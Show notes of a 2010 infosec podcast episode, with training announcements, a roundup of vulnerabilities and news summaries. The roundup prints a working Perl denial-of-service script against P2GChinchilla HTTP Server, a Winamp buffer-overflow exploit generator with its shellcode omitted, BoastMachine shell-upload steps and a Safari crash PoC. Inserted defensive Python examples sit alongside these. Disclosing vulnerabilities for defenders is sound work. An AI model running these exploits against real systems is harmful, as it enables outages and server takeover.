InfoSec Podcast Episode 55 for January 27, 2010. This podcast is our contribution back to the community: we discuss vulnerabilities of interest and information-security-related news, hopefully providing you a few laughs and a little knowledge.
Announcements:
Community SANS Atlanta 2010 Spring Schedule has been posted.
SEC-606: Drive and Data Recovery Forensics 2/9/10 to 2/13/10
SEC-502: Perimeter Protection In-Depth 2/22/10 to 2/27/10
AUD-507: Auditing Networks, Perimeters, and Systems 3/15/10 to 3/20/10
MGT-512: SANS Security Leadership Essentials For Managers with Knowledge Compression 4/15/10 to 4/21/10
SEC-566: 20 Critical Security Controls – In Depth 5/17/10 to 5/21/10
Go online to register by going to the SANS website or call (301) 654-SANS(7267).
SANS 2010 Orlando, Fl. March 6 – 15, 2010 (http://www.sans.org/sans-2010/)
Vulnerabilities of Interest:
1. P2GChinchilla HTTP Server version 1.1.1 is subject to a remote denial of service. Exploit code is available:
#!/usr/bin/perl
# File Name : P2GChinchilla[TM] HTTP Server
# Vuln : Remote Denial Of Service Exploit
# Author : Zer0 Thunder
# Msn : zer0_thunder@colombohackers.com
#
#
##==---->>
#
# Exploit Title: P2GChinchilla[TM] HTTP Server 1.1.1 Remote Denial Of Service Exploit
# Date: 22/01/2010
# Author: Zer0 Thunder
# Site : http://www.proggies2go.org/pages/p2gChinchilla.html?ref=PAD
# Software Link: http://www.proggies2go.org/pages/p2gChinchilla/p2gChinchilla.rar
# Version: v 1.1.1
# Tested on: Server runs on Windows XP Sp2 /Test on Remote Location
##==---->>
use IO::Socket::INET;
$ip = $ARGV[0];
$port = $ARGV[1];
# No host given: print the banner and usage, then quit
if (! defined $ARGV[0])
{
    print "\t+================================================================+\n";
    print "\t+ -- P2GChinchilla[TM] HTTP Server 1.1.1 Denial Of Service --+\n";
    print "\t+ -- Author :Zer0 Thunder --+\n";
    print "\t+ -- DATE: :[24/01/2010] --+\n";
    print "\t+ -- ------------------------------------------------ --+\n";
    print "\t+ -- Usage :perl exploit.pl [Host/Remote IP] [Port] --+\n";
    print "\t+ -- --+\n";
    print "\t+================================================================+\n";
    print "\n";
    print " Ex : exploit.pl localhost 50000\n"; # P2GChinchilla default port is 50000
    exit;
}
print "\t+================================================================+\n";
print "\t+ -- P2GChinchilla[TM] HTTP Server 1.1.1 Denial Of Service --+\n";
print "\t+ -- Author :Zer0 Thunder --+\n";
print "\t+ -- DATE: :[24/01/2010] --+\n";
print "\t+ -- ------------------------------------------------ --+\n";
print "\t+ -- Usage :perl exploit.pl [Host/Remote IP] [Port] --+\n";
print "\t+ -- --+\n";
print "\t+================================================================+\n";
print "\n";
print " Wait Till The Buffer is Done\n";
# Build a single 100,000,000-byte line of 'A' characters
my $b1 = "\x41" x 100000000;
print "\n";
print " DoS is UP !.. N Give it a Second \n";
# Connect to the server and send the oversized line as one request
$DoS = IO::Socket::INET->new("$ip:$port") or die;
print $DoS "stor $b1\n";
print $DoS "QUIT\n";
close $DoS;
# exit :
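A defender-side counterpart to the exploit above, added here and not taken from the podcast or from the P2GChinchilla project: a request reader that caps the length of a single line, so an oversized "stor" line is refused before it is buffered whole. The line and line-count limits, the verb handling and the status strings are assumptions.

```python
import io

# Assumed limits; the exploit above sends one 'stor' line of 100,000,000 bytes.
MAX_LINE_BYTES = 8192
MAX_LINES_PER_CONNECTION = 100

class LineTooLong(Exception):
    pass

def read_bounded_line(stream, limit=MAX_LINE_BYTES):
    """Read one line while buffering at most limit + 1 bytes.

    readline(size) returns after `size` bytes even when no newline has been
    seen, so an oversized line is detected without ever being held whole."""
    line = stream.readline(limit + 1)
    if len(line) > limit:
        raise LineTooLong("request line exceeds %d bytes" % limit)
    return line

def handle_connection(stream, limit=MAX_LINE_BYTES):
    """Consume one client session and return (status, verbs_seen).

    The first oversized line ends the session with an error instead of
    letting the peer dictate how much the server allocates."""
    verbs = []
    for _ in range(MAX_LINES_PER_CONNECTION):
        try:
            line = read_bounded_line(stream, limit)
        except LineTooLong:
            return "400 line too long", verbs
        if not line:                       # peer closed without QUIT
            return "closed", verbs
        verb = line.split(b" ", 1)[0].strip().upper()
        verbs.append(verb.decode("ascii", "replace"))
        if verb == b"QUIT":
            return "221 bye", verbs
    return "400 too many lines", verbs

def run_session(raw_bytes, limit=MAX_LINE_BYTES):
    """Feed a constructed client transcript through handle_connection()."""
    return handle_connection(io.BytesIO(raw_bytes), limit)

if __name__ == "__main__":
    # Constructed transcripts: a benign session and one shaped like the exploit's payload
    print(run_session(b"stor hello\nQUIT\n"))
    print(run_session(b"stor " + b"A" * 1_000_000 + b"\nQUIT\n"))
```

On a real socket the stream would be `conn.makefile("rb")`; the same readline(size) bound applies.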
2. The login page of the F2L-3000 version 4.0.0 is vulnerable to SQL injection. Exploiting the vulnerability may allow attackers to bypass authentication and access sensitive information stored on the device. A patch is not available at this time. Possible workarounds include disabling the vulnerable service or limiting access to a set of trusted IP addresses.
3. Winamp version 5.572 is subject to a local buffer overflow. Exploit code is available:
#!/usr/bin/perl
# Still learning, having some fun...
# Greetz to _-Sid-_ >Roadkill< Jess Dawn Linki
# Special greetz to Debug, even I don't know you. Nice find man.
# Exploit has something around 70% chance of success.
print "\n#########################################\n";
print "# Winamp 5.572 stack buffer overflow #\n";
print "# PoC by: Debug (eldadru\@gmail.com) #\n";
print "# Exploit by: NeoCortex (ICQ 158005940) #\n";
print "#########################################\n";
# ASCII-art banner (its original alignment did not survive extraction)
print " __ __________________\n";
print " ________ / \\ / / ____ / ____ / ________\n";
print " ________ /_______/ / /\\ \\ / / /___/ / / / / /_______/ ________ \n";
print " /_______/ _______ / / \\ \\ / / /_____/ / / / ________ /_______/\n";
print " /_______/ / / \\ \\/ / /_____/ /___/ / /_______/\n";
print " /_/ \\__/_______/_______/\n";
print " Where's the next phone box to the matrix please?\n\n\n";
my $version = "Winamp 5.572";
my $junk = "\x41" x 540;                 # filler up to the saved return address
my $eip = "\xad\x86\x0e\x07";            # overwrite EIP with 070E86AD (FFD4 CALL ESP in nde.dll)
my $nop = "\x90" x 100;                  # NOP sled ahead of the payload
my $shellcode = "";  # payload taken from http://www.metasploit.com
                     # windows/exec cmd=calc.exe
                     # (the hex-encoded payload bytes are omitted here)
# Write the crafted version-history file that Winamp later parses
open (myfile, '>> whatsnew.txt');
print myfile $version.$junk.$eip.$nop.$shellcode;
print "[+] whatsnew.txt written.\n";
print "[ ] Now copy it to your winamp folder...\n";
print "[ ] Run winamp and hit [About Winamp]->[Version History]\n";
4. BoastMachine version 3.1 is subject to a remote shell upload vulnerability.
- First register on the site at /Server/path/register.php
- Log in at /Server/path/login.php
- After logging in, go to /Server/path/bmc/files.php?form_id=new
- Upload the shell under a name like Shell.php.rar; it is then stored at /Server/path/files/username_Shell.php.rar
- e.g. http://sample.com/hp_boastMachine/files/username_Shell.php.rar
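The BoastMachine item turns on two weaknesses: an upload check that only looks at the last extension (so Shell.php.rar passes) and a stored name that is predictable from the username and upload name. The following upload-name validation is an added example, not BoastMachine's code; the allowlist, the executable-extension set and the owner-name rule are assumptions.

```python
import re
import secrets

# Assumed allowlist of what this upload endpoint should accept.
ALLOWED_EXTENSIONS = {"jpg", "jpeg", "png", "gif", "txt", "pdf", "zip", "rar"}
# Extensions a web server may hand to an interpreter; rejected wherever they
# appear in the name, so "Shell.php.rar" fails although its last part is allowed.
EXECUTABLE_EXTENSIONS = {"php", "php3", "php4", "php5", "phtml", "phar", "cgi",
                         "pl", "asp", "aspx", "jsp", "sh"}

class RejectedUpload(ValueError):
    pass

def safe_stored_name(original_name, owner):
    """Return the name to store the upload under, or raise RejectedUpload.

    Every extension component is checked, not just the last one, and the
    user-chosen basename is replaced by a random token so the stored path
    cannot be guessed from the upload name (the original scheme stored
    files/<username>_<upload name>). Serve the upload directory with script
    execution disabled as well; this check is not the only line of defence."""
    base = original_name.replace("\\", "/").rsplit("/", 1)[-1]  # drop any path part
    parts = base.lower().split(".")
    if len(parts) < 2 or not parts[0]:
        raise RejectedUpload("missing extension or dot-file name")
    exts = parts[1:]
    if exts[-1] not in ALLOWED_EXTENSIONS:
        raise RejectedUpload("extension .%s not allowed" % exts[-1])
    if any(e in EXECUTABLE_EXTENSIONS for e in exts):
        raise RejectedUpload("executable extension inside file name")
    if not re.fullmatch(r"[a-z0-9_-]{1,32}", owner.lower()):
        raise RejectedUpload("bad owner name")
    return "%s_%s.%s" % (owner.lower(), secrets.token_hex(8), exts[-1])

def is_accepted(original_name, owner):
    """True if the upload name passes the checks above."""
    try:
        safe_stored_name(original_name, owner)
        return True
    except RejectedUpload:
        return False
```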
5. Safari version 4.0.4 is subject to a JavaScript crash (denial of service) vulnerability. The following piece of JavaScript will crash Safari nicely when triggered using one of the methods described below. PoC code is available:
<script>
var data = "A";
// Double the string until it is at least 0x40000 characters long
while (data.length < 0x40000) {
    data += data;
}
// Fill an array with 4000 copies of twice that string
data2 = new Array();
for (x = 0; x < 4000; x++) {
    data2[x] = data + data;
}
</script>
News Items of Interest:
News item 1:http://www.benedelman.org/news/012610-1.html
Do you run Google's Toolbar? Did you disable the transmission to Google of the full URL of every page view, including searches at competing search engines? If a user wants to disable such transmissions, it should be easy to turn them off, right? You might be surprised to learn that, apparently, disabling them does not actually disable them when you are using "Enhanced Features" mode.
The standard Google Toolbar installation, by the way, encourages users to activate that mode via a "bubble" message shown at the conclusion of installation. The bubble presents a forceful request for users to activate Sidewiki, which is described as "enhanced" and "helpful", and Google chooses to tout it with a prominence that indicates Google views the feature as important. Moreover, the accept button features bold type plus a jumbo size (more than twice as large as the button to decline). And the accept button has the focus, so merely pressing Space or Enter (easy to do accidentally) serves to activate Enhanced Features without any further confirmation.
News item 2: http://www.pcadvisor.co.uk/news/index.cfm?RSS&NewsID=3211151
Hacker best known for cracking Apple’s iPhone says he’s done it again, this time with Sony’s PlayStation 3. In a blog post, George Hotz said that after a five-week effort, he’d finally managed to run his own software on the PlayStation 3, which typically only plays digitally signed software that is approved by Sony. “I have read/write access to the entire system memory, and [hypervisor] level access to the processor,” he wrote. “In other words, I have hacked the PS3.” He pulled off the feat using “very simple hardware, cleverly applied, and some not so simple software,” he added.
News item 3: http://news.cnet.com/8301-1009_3-10442305-83.html?part=rss&subj=news&tag=2547-1_3-0-20
The “Verified by Visa” credit-card authentication system has come under criticism from Cambridge University researchers, who say it is training online shoppers to adopt risky security habits.
The feature, which is used to authenticate online financial transactions, confuses people by not displaying security cues, security engineering researchers Ross Anderson and Steven Murdoch said in a paper (PDF) published Tuesday.
The primary purpose of 3DS is to allow a merchant to establish whether a customer controls a particular card number. It is essentially a single sign-on system, operated by Visa and MasterCard, and it differs in two main ways from existing schemes such as OpenID or InfoCard.
3D Secure is an XML-based protocol used as an added layer of security for online credit and debit card transactions. It was developed by Visa to improve the security of Internet payments and offered to customers as the Verified by Visa service. Services based on the protocol have also been adopted by MasterCard, under the name MasterCard SecureCode, and by JCB International as J/Secure.
3-D Secure adds another authentication step for online payments. Merchants are encouraged to use 3-D Secure to achieve higher coverage against fraud losses. When a merchant does not use 3-D Secure they are liable for fraudulent transactions even if the transaction was properly authorized. 3-D Secure should not be confused with the Card Security Code which is a short numeric code that is printed on the card.
Before 3DS can be used to authenticate transactions, cardholders must register a password with their bank. A reasonably secure method would be to send a password to the customer's registered address, but to save money the typical bank merely solicits a password online the first time the customer shops online with a 3DS-enabled card, known as activation during shopping (ADS).
News item 4:http://www.computerworld.com/s/article/9149218/Bank_sues_victim_of_800_000_cybertheft?
A Texas bank is suing a customer hit by an $800,000 cybertheft incident in a case that could test the extent to which customers should be held responsible for protecting their online accounts from compromises. In November, unknown attackers based in Romania and Italy initiated a series of unauthorized wire transfers from Hillary's bank accounts and depleted them by $801,495. About $600,000 of the amount was later recovered by PlainsCapital. Hillary demanded that the bank repay it the rest of the stolen money. In a letter to the bank in December, Hillary claimed that the theft happened only because PlainsCapital had failed to implement adequate security measures. The bank sought to absolve itself from blame in the heist by stating that the unauthorized wire transfer orders had been placed by someone using valid Internet banking credentials belonging to Hillary Machinery. "PlainsCapital accepted the wire transfer orders in good faith," and had therefore not breached any of its agreements with Hillary, the bank said in its complaint.
The case is also unusual because it is believed to be the first in which a bank has launched a pre-emptive lawsuit against a customer victimized by a cyber theft. Several other cases, in which companies that have been victims of such thefts have sued their banks for failing to implement reasonable security measures, are pending in courts around the country.
Hillary is still deciding its next steps, but according to its lawyer, Patrick Madden, the company will next file a response asserting that it was the bank’s failure to employ suitable security controls that resulted in the theft.
News item 5: http://www.omaha.com/article/20100126/NEWS97/701269885
Federal prosecutors in California say a Nebraska man will plead guilty to participating in a cyber attack on Church of Scientology Web sites in January 2008.
Brian Thomas Mettenbrink agreed to plead guilty Monday to the misdemeanor charge of unauthorized access of a protected computer, said Thom Mrozek, a spokesman for the U.S. attorney’s office in Los Angeles. Mettenbrink faces a year in federal prison.
Court records say Mettenbrink attacked Scientology Web sites as part of Anonymous, an underground group that protests the Church of Scientology, accusing it of Internet censorship.
Prosecutors say hackers conducted a “denial of service” attack, in which computers flood a target Web site with malicious Internet traffic, making it unavailable to legitimate users.
News item 6: http://news.techworld.com/security/3211146/researcher-reveals-another-ie-security-flaw/?olo=rss
A flaw in Microsoft’s Internet Explorer could allow a hacker to read files on a person’s computer, according to a security researcher. The claim represents another problem for the company just days after a serious vulnerability received an emergency patch. The problem was actually discovered as long as two years ago but has persisted despite two attempts by Microsoft to fix it, said Jorge Luis Alvarez Medina, a security consultant with Core Security Technologies. He is scheduled to give a presentation at Washington’s Black Hat conference on 3 February.
News item 7: http://blog.commandlinekungfu.com/